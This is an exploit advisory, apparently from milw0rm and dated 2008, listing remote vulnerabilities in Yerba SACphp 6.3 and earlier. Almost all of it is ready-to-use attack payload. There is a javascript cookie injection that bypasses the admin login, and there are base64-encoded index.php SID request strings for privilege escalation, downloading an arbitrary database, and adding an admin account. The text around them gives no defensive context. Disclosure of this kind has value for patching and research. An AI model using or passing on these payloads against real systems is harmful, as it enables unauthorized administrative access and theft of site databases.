21 lines
No EOL
789 B
Text
21 lines
No EOL
789 B
Text
[*]~======================================================~[*]
|
|
[*] Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities [*]
|
|
[*]~======================================================~[*]
|
|
|
|
[?] Discovered By StAkeR - StAkeR[at]hotmail[dot]it
|
|
[?] Discovered On 07/10/2008
|
|
[?] http://downloads.sourceforge.net/yerba/SACphp-6_28.tgz?modtime=1025222400&big_mirror=0
|
|
|
|
[?] Admin Login ByPass
|
|
[?] javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw=="
|
|
|
|
[?] Privilege Escalation
|
|
[?] index.php?SID=[path (base64 encoded)]
|
|
|
|
[?] Arbitrary Database Download
|
|
[?] index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ==
|
|
|
|
[?] Arbitrary Add Admin
|
|
[?] index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ==
|
|
|
|
# milw0rm.com [2008-10-07] |